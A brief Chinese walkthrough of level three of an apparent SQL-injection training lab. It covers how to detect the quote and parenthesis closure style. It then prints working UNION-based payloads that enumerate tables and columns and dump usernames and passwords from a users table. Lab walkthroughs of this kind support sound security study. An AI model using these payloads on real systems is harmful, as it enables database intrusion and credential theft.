第三关和前两关没什么区别,主要是闭合方式的差异,这里顺便总结一下闭合方式
- 整型
- 单引号
- 双引号
- 单引号加括号
- 双引号加括号
首先判断闭合方式
?id=1'
?id=1"
**1.**如果都报错,就是整型
**2.**如果单引号报错,双引号不报错,尝试
?id=1'--+
如果不报错就是单引号闭合,报错就是单引号加括号闭合
**3.**如果单引号不报错,双引号报错,尝试
id=1"--+
无报错则双引号闭合,报错则双引号加括号闭合
任何闭合方式在没有遇到相对应的闭合时,都会把这个符号当做一个整体,注释符也没用!!
单引号
双引号
尝试?id=1'--+
则可判断闭合方式是单引号加括号
其余与第一关就一样了
判断字段数、回显点、暴库名就舍去了
爆表名
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema ='security'--+
爆字段名
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema ='security' and table_name='users'--+
查数据
?id=-1') union select 1,group_concat(username,1,password),3 from security.users--+
完成